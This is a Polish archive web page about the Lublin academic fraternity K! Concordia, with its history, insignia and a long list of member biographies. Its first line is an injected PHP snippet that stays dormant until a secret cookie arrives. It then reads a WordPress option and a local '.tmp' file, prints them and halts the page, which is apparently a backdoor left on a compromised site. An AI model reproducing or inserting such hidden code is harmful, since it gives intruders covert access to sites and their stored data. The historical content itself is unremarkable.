if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Concordia

Dekiel Jana Zdzienickiego. Nazwa:
Polska Korporacja Akademicka Concordia
Siedziba:
Lublin
Data powstania:
22 X 1922 r.
Barwy:
stalowa – złota – karmazynowa
Dewiza:
„Concordia res parvae crescunt, discordia maxima dilabunter” („W zgodzie małe rzeczy rosną, a w niezgodzie nawet największe upadają”)

Rys historyczny

Szarfa Prezydialna

Concordia była najstarszą i i najsilniejszą korporacją w przedwojennym Lublinie. Założono ją dnia 28 X 1922 r., a w dniu 9 II 1923 r. statut Korporacji został zalegalizowany na Uniwersytecie Lubelskim.

Dnia 21 IV 1923 r. Concordię przyjęto do Związku Polskich Korporacji Akademickich na członka rzeczywistego (data starszeństwa związkowego: 21 IV 1923 r.). Dnia 9 X 1927 r. odbyła się uroczystość poświęcenia sztandaru Korporacji.

Zaproszenie na Bal Concordii, Lublin 1931 r.

Między innymi z inicjatywy prezesa Korporacji Andrzeja Grajnerta w końcu 1926 r. powstała w Lublinie K! Hetmania, która od 1927 r. kandydowała pod opieką Concordii w Związku Polskich Korporacji Akademickich. Obie korporacje tworzyły Lubelskie Koło Międzykorporacyjne stanowiące reprezentację Związku w Lublinie.

Concordia, druga poł. lat 20-tych.

Concordia zawarła kartele z dwoma korporacjami: czasowy dnia 10 V 1925 r., następnie przedłużony na wieczysty dnia 10 II 1929 r. z K! Leopolia ze Lwowa oraz w roku akademickim 1937/38 (?) z K! Maltania z Warszawy.

Komers Concordii, Lublin 1936 r.

Kuratorem Korporacji z ramienia uniwersyteckiego Senatu był prof. Henryk Insadowski. Siedziby Concordii mieściły się kolejno: w wynajętym pokoju w mieszkaniu prywatnym przy ul. Powiatowej 1, później w dwupokojowej oficynie przy ul. Narutowicza 34 (dom pp. Kalickich), a od 1934/35 w obszernym lokalu na terenie Katolickiego Uniwersytetu Lubelskiego.
Spotkanie Concordusów, 4 VI 1987 r.

Całkowita ustalona, niemal kompletna imienna lista członków obejmuje 146 nazwiska, w tym dziewięciu członków honorowych.

Po wojnie odbywały się nieregularnie spotkania członków korporacji. Do jej reaktywacji doszło w 2000 r. (www.concordia.republika.pl).

Lista członków

Poniższa, niekompletna lista członków Concordii obejmuje niemal 150 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Bronisław Bouffałł, (30 października 1867 Jurowcach k. Białegostoku - 8 lutego 1949 w Gdańsku) z rodziny ziemiańskiej, s. Juliana i Pauliny z Wińskich, absolwent IV Gimnazjum w Warszawie 1886, student i absolwent (mgr prawa) na Uniwersytecie w Petersburgu 1887-92, studiował w Heidelbergu i Paryżu 1894-95 oraz Oxfordzie 1896, docent Uniwersytetu w Petersburgu 1898-1914, oficer 13 Pułku Huzarów armii rosyjskiej; oficer w 2 Pułku Ułanów w Korpusie Polskim gen. Józefa Dowbor-Muśnickiego, a następnie dowódca dywizjonu w V Armii gen. Władysława Sikorskiego, oficer łącznikowy między Sztabem Głównym a brytyjską misją wojskową, mjr WP, naczelnik w Ministerstwie Skarbu, delegat Rządu Polskiego do państw bałtyckich, przedstawiciel RP przy Mieszanej Komisji i Trybunale Rozjemczym Górnego Śląska, charge d’affaires przy rządzie łotewskim w Rydze 1920-24, od 1908 członek Towarzystwa Naukowego Warszawskiego, prof. nadzw. prawa politycznego i prawa narodów 1924-27 oraz filozofii prawa 1925-27 na Wydziale Prawa i Nauk Społeczno-Ekonomicznych UL-KUL, dziekan Wydziału 1925/26, Filister honorowy Concordii, odznaczony Krzyżem Walecznych i Krzyżem Niepodległości, pochowany w Gdyni
 2. Stanisław Bryła, (17 maja 1888 w Krakowie - 23 grudnia 1939 w Lublinie) student i absolwent Wydziału Prawnego UJK 1906-10, doktorat UJK 1912, adwokat, od 1918 członek POW, po wojnie starosta w Przasnyszu 1919-23, wicewojewoda i p.o. wojewody lubelskiego 1923-26, później sędzia, m.in. wiceprezes Sądu Okręgowego w Radomiu 1932-37 oraz prezes Sądu Okręgowego w Lublinie 1937-39, radny miasta Lublina 1927-29, od 1927/28 wykładał prawo administracyjne na KUL, Filister honorowy Concordii, aresztowany przez Niemców we wrześniu 1939, zginął rozstrzelany wraz z grupą zakładników, obywatel honorowy Przasnysza i Chorzeli, odznaczony m.in. Krzyżem Oficerskim OOP i dwukrotnie Złotym Krzyżem Zasługi

  Henryk Insadowski, 1938 r.

 3. Henryk Insadowski, (13 stycznia 1888 w Karnikowie k. Lipna - 14 marca 1946 w Lublinie), absolwent ł szkoły handlowej i Seminarium Duchownego we Włocławku, ksiądz katolicki, doktorat Papieski Uniwersytet Gregoriański w Rzymie, wykładał na UW, a następnie prawo rzymskie na Wydziale Prawa i Nauk Społeczno-Ekonomicznych oraz Wydziale Prawa Kanonicznego KUL 1922-39, a także prawo Kościołów Wschodnich na Wydziale Teologicznym KUL, zastępca prof. i prof. nadzw. KUL, prodziekan 1935-37 i dziekan 1937-39 oraz 1944-46 Wydziału Prawa Kanonicznego KUL, kurator i Filister honorowy Concordii, w czasie okupacji przez kilka miesięcy więziony na Zamku Lubelskim, członek Towarzystwa Naukowego KUL, autor licznych prac z zakresu prawa kanonicznego i prawa rzymskiego

 4. Władysław Jung, (23 czerwca 1870 w Gorlicach - 1 stycznia 1940 we Lwowie) absolwent wydział artylerii Akademii Wojskowo Technicznej w Wiedniu, walczył w armii austriackiej w I wojnie światowej na frantach rosyjskim i włoskim, płk artylerii Cesarskiej i Królewskiej Armii, od 1919 w WP, gen. brygady, m.in. dowódca 1 Pułku Arytlerii Polowej i I Brygady Artylerii 1919, dowódca 15 Dywizji Piechoty 1920-24, dowódca Okręgu Korpusu nr IV w Łodzi 1924-26 i nr II w Lublinie 1926-28, Filister honorowy Concordii, od 1928 w stanie spoczynku, aresztowany z żoną w grudniu 1939 w czasie nielegalnego przekraczania sowiecko-niemieckiej linii demarkacyjnej, nierozpoznany, w czasie aresztu doznał odmrożenia stóp i gangreny, po przewiezieniu do szpitala we Lwowie zmarł, pochowany na cmentarzu Łyczakowskim, odznaczony m.in. Krzyżem Srebrnym Orderu Wojennego Virtuti Militari, Krzyżem Komandorskim OOP, trzykrotnie Krzyżem Walecznych oraz Krzyżem Komandorskim Legii Honorowej

  Ludomir Kłobski, ok. 1915 r.

 5. Ludomir Kłobski, (1873 w Niedźwiedziej Woli - 15 lutego 1957) z rodziny ziemiańskiej herbu Pomian, s. Władysława i Franciszki z Pruszkowskich, ojciec Bohdana (Concordia), absolwent gimnazjum w Kaliszu, początkowo pracował jako administrator w dobrach opolskich Władysława Kleniewskiego, przed I wojną światową kupił maj. Dominów k. Lublina, wspierał budowę KUL, został Filistrem honorowym Concordii, w 1929 przeniósł się z rodziną do Czepowa koło Koła, gdzie zarządzał trzema majątkami, zaangażowany w Związku Ziemian, w 1939 wraz z synem Bohdanem aresztowany przez Niemców i osadzony w więzieniu jako zakładnik, w grudniu 1939 wraz z rodziną wywieziony do Bochni, skąd wyjechał na Lubelszczyznę, administrował maj. Niezdów, a później maj. Strzyżów i maj. Rokotów, po wojnie po nacjonalizacji przez władze komunistyczne maj. Czepów osiadł w Kaliszu, gdzie został kierownikiem gospodarczym maj. Zalesie, a później sekretarzem przy Powiatowym Biurze Rolnym w Kaliszu, zarządzał maj. Warszówka 1947-49, pochowany w grobowcu rodzinnym w Topoli Królewskiej pod Łęczycą

  Józef Kruszyński, 1938 r.

 6. Józef Kruszyński, (18 marca 1877 w kolonii Poraj k. Piotrkowa Trybunalskiego - 10 sierpnia 1953 we Włocławku) z biednej rodziny rolniczej, s. Franciszka i Konstancji z Domańskich, studiował we włocławskim Seminarium Duchownym 1894-99 oraz Akademii Duchownej w Petersburgu 1899-1902, mgr teologii 1902, święcenia kapłańskie 1903, prof. biblistyki, archeologii biblijnej i języka hebrajskiego w Seminarium Duchownym we Włocławku, współred. „Ateneum Kapłańskie”, „Kalendarza Rady Opiekuńczej”, „Słowa Kujawskiego”, „Wiary i Życie”, wiceregens Seminarium 1905-22, habilitacja UJ 1924, od 1923 wykładowca KUL, od 1924 prof. nadzw., a od 1925 prof. zw., rektor KUL 1925-33, założyciel Towarzystwa Naukowego KUL, kurator Sodalicji Mariańskiej Akademiczek na KUL i Akademickiego Stowarzyszenia Charytatywnego „Pomoc Bliźniemu”, Filister honorowy Concordii, po wybuchu wojny więziony przez Gestapo na Zamku Lubelskim, wikariusz generalny diecezji lubelskiej 1940-45, po wojnie oficjał Sądu Biskupiego we Włocławku i proboszcz katedry włocławskiej, wykładowca we włocławskim Seminarium Duchownym, autor szeregu przekładów ksiąg Starego Testamentu i komentarzy, autor szeregu prac naukowych, wyróżniony tytułami kanonika Kolegiaty Kaliskiej, kanonika Kapituły Katedralnej Włocławskiej, protonotariusza apostolskiego oraz Prałata Domowego Papieża Piusa XI, odznaczony Krzyżem OOP

 7. Edward Rettinger, (31 sierpnia 1888 - 26 października 1953 w Warszawie) s. Leonarda (przemysłowca?) i Kazimiery z d. Niemyska, ojciec Stanisława (Lauda Kraków), adwokat w Lublinie, a następnie w Warszawie, Filister honorowy Concordii, w czasie wojny więziony w obozie koncentracyjnym w Auschwitz, po wojnie obrońca w procesach politycznych, m.in. Rzepeckiego i Tatara, pochowany w grobie rodzinnym na Powązkach
 8. Henryk Sachs, (1867 - 1934) s. Edmunda (prawd. Konwent Polonia) i Aleksandry z d. Bełczykiewicz, ziemianin, właściciel maj. Abramowice, działacz, społeczny, poseł na Sejm, Filister honorowy Concordii [więcej Zbigniew Zaporowski, Sachs Henryk Aleksander (1867-1934), (w:) PSB, t. 34, s. 268-269]
 9. Leon Waściszewski (vel Waściszakowski), (20 sierpnia 1886 w Rudzie k. Mińska Mazowieckiego - 22 marca 1935 w Warszawie) student Wydziału Agronomicznego Instytutu Gospodarstwa Wiejskiego i Leśnictwa w Puławach 1907-12 i na Uniwersytecie w Kijowie, habilitacja UJ, prof. nadzw. Wydziału Prawa i Nauk Społeczno-Ekonomicznych KUL 1918-35, wykładowca statystyki i polityki ekonomicznej, dziekan 1919-22 i 1924/25 i prodziekan 1926-28 Wydziału, wicerektor KUL 1922-25, członek-założyciel Towarzystwa Naukowego KUL, Filister honorowy Concordii

Członkowie rzeczywiści

 1. Bronisław Arnold, sekretarz 1927/28, wiceprezes 1928/29 oraz 1929/30
 2. Włodzimierz Auderski, ( - przed 1939) c. 1931, miał zginąć tragicznie w wypadku motocyklowym
 3. Józef Bartoszek,
 4. Zygmunt Bądziejewski, c. 1927
 5. Kazimierz Bieliński, (1915-1959) c. 1935 (?), prawnik, adwokat w Warszawie
 6. Eugeniusz Bogucki, oficer 8 Pułku Piechoty Legionów (?)

  Czesław Borer, 1930 r.

 7. Czesław Borer, (18 lipca 1898 w Lublinie - 20 maja 1942) założyciel Concordii 1922, wiceprezes 1923/24, absolwent prawa KUL 1923, adwokat w Lublinie; 9 listopada 1939 aresztowany i osadzony na zamku lubelskim, następnie zwolniony

 8. Tadeusz Borysławski (Boryszewski ?), prawnik, notariusz w Biłgoraju
 9. Juliusz Brodziak,
 10. Jerzy Brodzki, adwokat w Lublinie
 11. Zygmunt Brydacki, c. 1932, adwokat w Lublinie
 12. Włodzimierz Brzezicki,
 13. Tadeusz Chmielewski, mgr praw, prokurator
 14. Zygmunt Chrobociński, ( - 2004) c. 1936, prawnik, adwokat w Kraśniku pod Lublinem

  Ludwik Christians, 1930 r.

 15. Ludwik Christians, (5 marca 1902 w Jampolu Podolskim - 2 października 1956 w Warszawie) student i absolwent prawa UL 1923-27, adwokat w Lublinie, później w Warszawie, polityk chadecki, poseł na Sejm RP z ramienia SN, ppor. rez. piechoty, ciężko ranny w wojnie obronnej 1939, prezes Zarządu Głównego PCK 1945-46, później pracował jako adwokat

 16. Józef Czerniak, (ok. 1902 - 1974?) mgr praw, adwokat w Lublinie
 17. Lech Czernicki,
 18. Stanisław Czubaszek, założyciel Concordii 1922
 19. Jerzy Demieńczuk (Demeńczuk, Demiańczuk, Dziemiańczuk), prawnik, adwokat pod Lublinem
 20. Jan Dołowski, ( - zm. w Lublinie) olderman 1931/32, wiceprezes 1934/35, prawnik, adwokat w Lublinie
 21. Mieczysław Domańczyk, c. 1932 (?), fuksmajor 1932, prawnik, adwokat w Lublinie
 22. Tadeusz Dziemski (Dzienski ?),
 23. Tadeusz Ejchler,
 24. Ludwik Lucjan Fijuth, ( - po 1945 w Stanach Zjednoczonych) absolwent Liceum im. Hetmana Zamoyskiego w Lublinie, mgr praw, kpt. lotnictwa, po wojnie na emigracji w Stanach Zjednoczonych
 25. Kazimierz Foryś,

  Antoni Freyberg, druga poł. lat 30-tych.

 26. Antoni Freyberg, (12 VI 1915 - 20 września 1939 w Siennicy Różnej k. Krasnystawu) z rodziny kupieckiej, c. 1936, wiceprezes 1938/39, student prawa KUL, plutonowy pchor. piechoty rez., poległ w wojnie obronnej 1939, pochowany na cmentarzu przy ul. Lipowej w Lublinie

  Aleksander Gantner, druga poł. lat 30-tych.

 27. Aleksander Gantner, (13 stycznia 1914 w Radomiu – 11 grudnia 1981 w Lublinie) s. Franciszka i Zofii z Barszczyńskich, absolwent Państwowego Gimnazjum im. Jana Kochanowskiego w Radomiu 1935, student i absolwent (mgr prawa) prawa KUL 1935-39, w okresie okupacji nauczyciel tajnego nauczania, po wojnie pracował do emerytury w Magistracie Lubelskim, gdzie kierował Urzędem Stanu Cywilnego, pasjonat fotografii (m.in. zdjęcia 20-lecia KUL, przedwojennego Lublina publikowane na łamach Kuriera Lubelskiego i na stronach internetowych Teatru NN w Lublinie), pochowany na cmentarzu przy ul. Lipowej w Lublinie

  Zdzisław Glogier, 1935 r.

 28. Zdzisław Glogier, (26 stycznia 1909 w Radomiu - 17 września 1980 w Radomiu) herbu Pracowoc, s. Macieja i Martyny z Wereszczyńskich, student i absolwent prawa KUL, wiceprezes 1935 (II), prezes 1937/38 oraz 1939, prezes Bratniej Pomocy Studentów KUL 1935, adwokat, w czasie okupacji czynny w AK, po wojnie zamieszkał w Sopocie, skąd w końcu lat 40-tych przeniósł się do Radomia

 29. Tadeusz Głuchowski, (29 sierpnia 1908 w Lublinie - 4 maja 1990 w Lublinie) brat Stanisława (Concordia), absolwent Gimnazjum im. Hetmana Zamoyskiego w Lublinie, student i absolwent prawa KUL, c. 1928, przewodniczący komitetu red. “Wiadomości Korporacyjnych” 1928, aplikant sądowy w Lublinie 1929-32, aplikant adwokacki 1932-36, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu, kapral pchor. rez. artylerii, uczestnik wojny obronnej 1939, internowany w obozie Samogyszentmiklos na Węgrzech, od 1940 w PSZ na Zachodzie, walczył we Francji w 4 Pułku Artylerii Lekkiej w Anglii i we Włoszech, pchor. artylerii 2 Korpusu, w 1947 powrócił do kraju i rozpoczął praktykę adwokacką, odznaczony Brązowym Krzyżem Zasługi z Mieczami, Medalem Wojny 1939-1945, Krzyżem Monte Cassino, Croix des Combattants Volontaires, działacz PCK, Ligi Morskiej i Kolonialnej, w Zrzeszeniu Prawników i AZS, współzałożyciel Klubu Motocyklowego i Klubu Automobilowego
 30. Stanisław Głuchowski, ( - czerwiec 1928 w Zakopanym) brat Tadeusza (Concordia)
 31. Jerzy Godziejewski, założyciel Concordii 1922, pierwszy olderman 1922/23
 32. Tadeusz Górnicki,
 33. Andrzej Grajnert, (1905-1983) ukończył Gimnazjum im. Hetmana Jana Zamoyskiego w Lublinie, student i absolwent prawa KUL, olderman 1923/24, 1924/25 (?) oraz 1925/26, prezes 1924/25, 1926/27 oraz 1927/28, członek Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25, inicjator powołania Korporacji Hetmania 1926, adwokat w Warszawie

  Stanisław Hejke, druga poł. lat 30-tych (?).

 34. Stanisław Hejke, (1912-1984) olderman 1935/36, prezes 1936/37, wiceprezes 1939, prawnik, adwokat w Płocku

 35. Zygmunt Hirstein, mgr praw, adwokat
 36. Józef Jakimiński, (1913-1967) c. 1936
 37. Józef Janowski, (21 lipca 1910 w Hrubieszowie pow. Siedlce - 14 lutego 1984 w Bartodziejach w Radomskim) herbu Jastrzębiec, s. Bolesława i Marii z Żółkowskich, c. 1931, absolwent prawa KUL, Szkoły Podchorążych w Grudziądzu, por. WP, w czasie okupacji w AK, administrator maj. Rusków w Siedleckim, żołnierz II Armii LWP, po wojnie prowadził rodzinne gospodarstwo rolne w Bartodziajach, a także jako inspektor chmielarstwa, działacz społeczny w związku ogrodników SITO, pochowany na cmentarzu w Bartodziejach
 38. Marian Januszewicz,
 39. Tadeusz Jaszowski, (1916 - ) c. 1934, mgr praw, prokurator, autor licznych publikacji o podziemiu
 40. Henryk Jezierski, ( - 19 listopada 1993) prawnik, adwokat w Warszawie
 41. Tadeusz Kaczmarski, c. 1933 (?)
 42. Kazimierz Kalicki, (16 października 1902 w Lublinie - 22 lipca 1944 w Lublinie) s. Aleksandra i Michaliny z Kosińskich, brat Mariana (Concordia), c. 1927(?), olderman 1928/29, po studiach współwłaściciel firmy jubilerskiej “Aleksander Kalicki i Syn” w Lublinie, por. rez., współorganizator “Krokusów Lubelskich” - ochotniczej formacji kawaleryjskiej przy 24 Pułku Ułanów w Kraśniku, w 1942 aresztowany i osadzony w obozie w Auschwitz, w 1944 powtórnie aresztowany, zamordowany na Zamku Lubelskim 1944

  Marian Kalicki, 1928 r.

 43. Marian Kalicki, (11 sierpnia 1907 w Lublinie - 25 marca 1979 w Warszawie) s. Aleksandra i Michaliny z Kosińskich, brat Kazimierza (Concordia), absolwent Gimnazjum Męskiego “Szkoła Lubelska” 1926, student i absolwent prawa KUL 1926-31, ukończył podchorążówkę w Biedrusku 1930/31, od 1937 adwokat we Włodawie, w wojnie obronnej jako ppor. piechoty w 8 Pułku Piechoty Legionów, pracownik Ministerstwa Sprawiedliwości 1944-46, od 1946 adwokat i obrońca wojskowy w Warszawie, wicedziekan Rady Adwokackiej w Warszawie 1964-67

  Tadeusz Kaszubski, 1937 r.

 44. Tadeusz Kaszubski, (1916-1987) sekretarz sem. let. 1935/36, wiceprezes 1936/37, sekretarz 1939, więzień obozu w Auschwitz, mgr praw, adwokat, dziekan Izby Adwokackiej we Wrocławiu

  Jerzy Apolinary Kisyński, ok. 1930 r.

 45. Jerzy Apolinary Kisyński, (1 października 1907 w Ostrowcu Świętokrzyskim - 2 marca 1993 w Lublinie) s. Abdona Kisyńskiego i i Anny z Kopczyńskich, absolwent koedukacyjnego Gimnazjum Humanistycznego Jana Kurtza w Lubartowie, studia prawa KUL, c. 1931, fuksmajor 1931/32, m.in. pracował w Urzędzie Ziemskim i Wydziale Rolnictwa Urzędu Wojewódzkiego w Lublinie, prowadził prywatne Biuro Techniczne zajmujące się budownictwem wodnym, melioracjami oraz wiertnictwem studziennym i badawczym 1941-49 , w czasie okupacji ppor. AK ps. “Dąbrowa”, mgr inż. melioracji (budownictwa wodnego) PW 1946, po wojnie m.in. dyrektor lubelskiego oddziału Biura Studiów i Projektów Melioracyjnych 1963-73, bezpartyjny

 46. Zbigniew Klaudel, zamordowany w czasie okupacji (?)

  Bohdan Kłobski, 1935 r.

 47. Bohdan Kłobski, (6 października 1912 w Dominowie k. Lublina - 27 grudnia 1998 w Gdyni) z rodziny ziemiańskiej herbu Pomian, s. Ludomira (Concordia) i Bożenny z Kleniewskich, absolwent Gimnazjum Humanistycznego im. ks. Jana Długosza we Włocławku, student i absolwent prawa KUL 1932-36 (dyplom 1938), c. 1932, skarbnik 1935 (II), olderman 1937/38, w wojnie obronnej 1939 w obronie Warszawy, po powrocie do maj. Czepów aresztowany przez Niemców i osadzony wraz z ojcem w więzieniu jako zakładnik, w grudniu 1939 z rodziną wywieziony do Bochni, skąd przenieśli się na Lubelszczyznę, pracował jako magazynier w maj. Skoków, żołnierz AK ps. “Dominik”, od 1945 pracował w Ministerstwie Aprowizacji w Warszawie, a od 1946 w Zakładach Przemysłu Rybnego “Społem” i w Centrali Rybnej w Gdyni, radca prawny w Stoczni Gdańskiej 1950-78, a także w innych przedsiębiorstw Trójmiasta, działacz społeczny, odznaczony m.in. medalem za udział w wojnie obronnej 1939, odznaką honorową “Zasłużony Ziemi Gdańskiej” oraz Srebrnym Krzyżem Zasługi, pochowany na Cmentarzu Witomińskim w Gdyni

  Eugeniusz Kłoczkowski, pierwsza poł. lat 30-tych.

 48. Eugeniusz Kłoczkowski, sekretarz 1931/32, mgr praw, adwokat Lublin

  Jerzy Kotyński, 1936 r.

 49. Jerzy Kotyński,

 50. Zygmunt Kozłowski,
 51. Kazimierz Królikowski, (22 stycznia 1906 - ) mgr praw KUL 1930, ppor. rez. piechoty 1932, adwokat w Zamościu i Hrubieszowie, w wojnie obronnej 1939 w 8 Pułku Piechoty Legionów 3 Dywizji Piechoty, ranny pod Tomaszowem Lubelskim, trafił do niewoli niemieckiej, w obozach niemieckich w Norymberdze i Murnau, po wojnie wrócił do kraju, prowadził kancelarię w Hrubieszowie, a od 1946 w Zamościu
 52. Stanisław Królikowski,
 53. N. Krynicki,
 54. Stefan Kucharzewski, (1906-1961) członek komitetu red. “Wiadomości Korporacyjnych” 1928, uczestnik wojny obronnej 1939, żołnierz PSZ na Zachodzie, m.in. W oddziałach gen. Stanisława Maczka, więzień obozów jenieckich, prawnik, adwokat w Lublinie
 55. Zygmunt Kulczycki, (1/14 maja 1909 w Czeczelniku na Podolu - 1940 w Katyniu) s. Władysława i Zofii z Borkowskich, uczeń Gimnazjum im. M. Reja w Warszawie i Gimnazjum im. T. Kościuszki w Wieluniu, student i absolwent prawa KUL 1929-34, sekretarz 1932/33, dr prawa, adwokat w Lublinie, absolwent Szkoły Podchorążych Rezerwy Piechoty nr 7a w Jarocinie, przydzielony do 8 Pułku Piechoty Legionów, w niewoli sowieckiej, zamordowany przez NKWD
 56. Mieczysław Kurek, ( - 2 stycznia 1993)

  Jerzy Lachowicz, prawd. 1929 r.

 57. Jerzy Lachowicz, członek Młodzieży Wszechpolskiej

 58. Stefan Lasota, skarbnik Concordii 1939
 59. Eugeniusz Laurelle de Georgel,
 60. Kazimierz Lerkam (Lerkan ?), ( - po 1945) mieszkał w Lublinie
 61. Lipani (Lipari), c. 1938
 62. Krzysztof Lipczyński, poeta
 63. Edmund Lipecki, (11 lutego 1911 w Końskowoli k. Puław - ) absolwent Gimnazjum im. hetmana Jana Zamoyskiego w Lublinie, student polonistyki Wydziału Humanistycznego KUL, olderman 1935 (II), asystent w Katedrze Historii Literatury KUL

  Wacław Lipski, 1938 r.

 64. Wacław Lipski,

 65. Wiktor Lubieniecki, członek Concordii, później założyciel Lublinii, członek Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25

  Mieczysław Lucht, lata 30-te.

 66. Mieczysław Lucht, ( - 1944 w Warszawie) sekretarz 1934/35, zginął rozstrzelany w Powstaniu Warszawskim

 67. Stanisław Lucht, ( - 1979) wiceolderman 1931, prezes sem. let. 1933/34

  Józef Łazuka, koniec lat 30-tych.

 68. Józef Łazuka, (15 marca 1911 w Uniszowicach w gm. Konopnica w pow. lubelskim - 11 września 1978 w Lublinie) s. Walentego i Franciszki z Busków, absolwent kierunku humanistycznego w Gimnazjum Koedukacyjnym Towarzystwa Szkół Średnich w Janowie Podlaskim 1934, student i absolwent prawa KUL, c. 1936(?), wiceprezes 1937/38, prezes 1938/39, ostatni prezes 1939, oficer rez. w stopniu chorążego, w czasie okupacji w konspiracji w AK, w lipcu 1941 arresztowany i osadzony za Zamku Lubelskim jako zakłdnik, wykupiony przez rodzinę, w 1942 ponownie aresztowany, przechowywał Żydów w swoim gospodarstwie Mostki, kolonia Dąbrowica k. Lublina, ochotnik WP, ppor. Szefostwa Wydziału Weterynaryjnego 54 Frontowej Składnicy Weterynaryjnej, po wojnie aplikant sądowy w Sądzie Apelacyjnym 1946-49, aplikant adwokacki 1949-50, od 1950 adwokat Wojwódzkeij Rady Adwokackiej, w 1951 skreślony z listy jako “kułak”, w 1952 po odwołaniu przywrócony, adwokat Zespołu Adwokackiego nr 4 w Lublinie 1953-74, działał społecznie w Centralnym Związku Spółdzielni Budownictwa Mieszkaniowego, odznaczony “Odznaką Grunwaldzką” 1945, “Medalem zwycięstwa i wolności” 1947, Srebrną Odznaką Centralnego Związku Spółdzielni Budownictwa Mieszkaniowego 1968, pochowany na Cmentarzu Komunalnym w Lublinie

 69. Józef Majewski, ( - 1944) brat stryjeczny Tomasza (Concordia), zginął w partyzantce AK
 70. Tomasz Majewski, ( - 18 maja 2006) brat stryjeczny Józefa (Concordia), prawnik, prokurator, sędzia Sądu Najwyższego, po stanie wojennym adwokat w Grójcu, sekretarz i członek Zarządu Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993-95
 71. Jerzy Marcinkowski, (1904 - 20 października 1993) prezes 1925/26, prawnik, prokurator w Krakowie
 72. Adam Matejec, (28 września 1907 w Jasieniowcu Górnym w woj. stanisławowskim - 1940 w Charkowie) s. Pawła, student i absolwent 1932 prawa KUL, ppor. rez., przydzielony do 45 Pułku Piechoty, zamordowany przez NKWD
 73. Edward Matuszyński,
 74. Jerzy Mazurek,
 75. Stanisław Mazurek,
 76. Jerzy Miłkowski, mgr praw, adwokat
 77. Zygmunt Miłkowski, skarbnik (?) 1932/33
 78. Andrzej Modrzewski, (15 lipca 1903 w Lublinie - 13 listopada 1993) absolwent Szkoły Handlowej im. Vetterów, ochotnik w wojnie 1920, student prawa KUL i UJK, mgr praw UJK, studia kontynuował na uniwersytetach w Nancy 1926 i Sorbonie 1926/27, założyciel Concordii 1922, pierwszy sekretarz 1922/23, wiceprezes 1924/25 oraz 1926/27, asystent w Katedrze Prawa Cywilnego KUL 1927-34, adwokat w Lublinie, uczestnik wojny obronnej 1939, aresztowany 9 listopada 1939 i więziony na Zamku Lubelskim, zwolniony 22 grudnia 1939, odznaczony Medalem 40-lecia za zasługi w pracy adwokackiej
 79. Nikodem Nowotarski, ( - 1939) pochwycony przez sowiecką straż graniczną przy przekraczaniu granicy południowej, zastrzelony jesienią 1939 (wg innej wersji: popełnił samobójstwo przy przekraczaniu granicy w Zaleszczykach 1939)
 80. Jacek Odrowąż-Pieniążek, (1917-1939)

  Henryk Ołtuszewski, lata 30-te.

 81. Henryk Ołtuszewski, ( - zm. we Wrocławiu), prezes 1934/35, ekonomista, bankowiec, dyrektor banku we Wrocławiu

 82. Stanisław Orłowski, c. 1931
 83. Jerzy Paszyc, ( - 1939-45 w Warszawie), ostatni wiceprezes 1939, zginął w czasie okupacji na Pawiaku
 84. Stefan Popiel, c. 1931/32 (?)

  StanisławPoźniak-Poznański, 1935 r.Stanisław Poźniak-Poznański, lata 30-te.

 85. Stanisław Poźniak-Poznański, ( - 1940) c. 1931, sekretarz sem. let. 1933/34, sekretarz 1935 (II), wiceprezes sem. let. 1935/36, zginął na Lubelszczyźnie zastrzelony w ucieczce przed Gestapo (wg innej wersji: zmarł na serce)

 86. Tytus Prawecki, ( -1966) prezes 1930/31, właściciel salonu mody męskiej w Lublinie
 87. Jan Przegaliński, założyciel Concordii 1922, sekretarz 1923/24 oraz 1924/25, wiceprezes 1925/26, ziemianin
 88. Zbigniew Pyzikowski, mgr praw, sędzia w Lublinie
 89. Ryszard Rachwald, (26 listopada 1914 w Mińsku Mazowieckim - 29 maja 1993 w Lublinie) s. Ryszarda i Janiny z d. Grafczyńska, ukończył Gimnazjum im. St. Staszica w Lublinie, student prawa i absolwent KUL 1934-39, uczestnik kongresów młodzieży akademickiej w Helsinkach, Budapeszcie i Bukareszcie, przeszkolony w 1939 w Łucku w formacjach Obrony Narodowej WP, w wojnie obronnej 1939 w kompanii wartowniczej w Zdołbunowie, w czasie okupacji odbył aplikację sądową i zdał egzamin sędziowski w Lublinie oraz pracował w komitecie powiatowym Rady Głównej Opiekuńczej, od 1944 w AK, przeszkolony w Leśnej Szkole Podchorążych, po wojnie asystent w Katedrze Teorii i Filozofii Prawa KUL, adwokat w Lublinie 1945-84, obrońca w sprawach karnych, pochowany na cmentarzu przy ul. Lipowej w Lublinie
 90. Hieronim Racinowski, (30 września 1902 w Lublinie - 1973) mgr praw 1931, prezes aplikantów prawniczych na Okręg Sądu Apelacyjnego w Lublinie, asesor sądowy, rzecznik dyscyplinarny przy Komisji Dyscyplinarnej Sądu Apelacyjnego w Lublinie i sędzia Sądu Grodzkiego we Włodawie, w 1939 prowadził kancelarię adwokacką przy ul. Narutowicza 36/5 w Lublinie, zmobilizowany w sierpniu 1939, uczestnik wojny obronnej 1939, później walczył we Francji, ewakuowany do Wielkiej Brytanii, po wojnie wrócił do kraju, sędzia w Lubartowie
 91. Józef Romanowski,
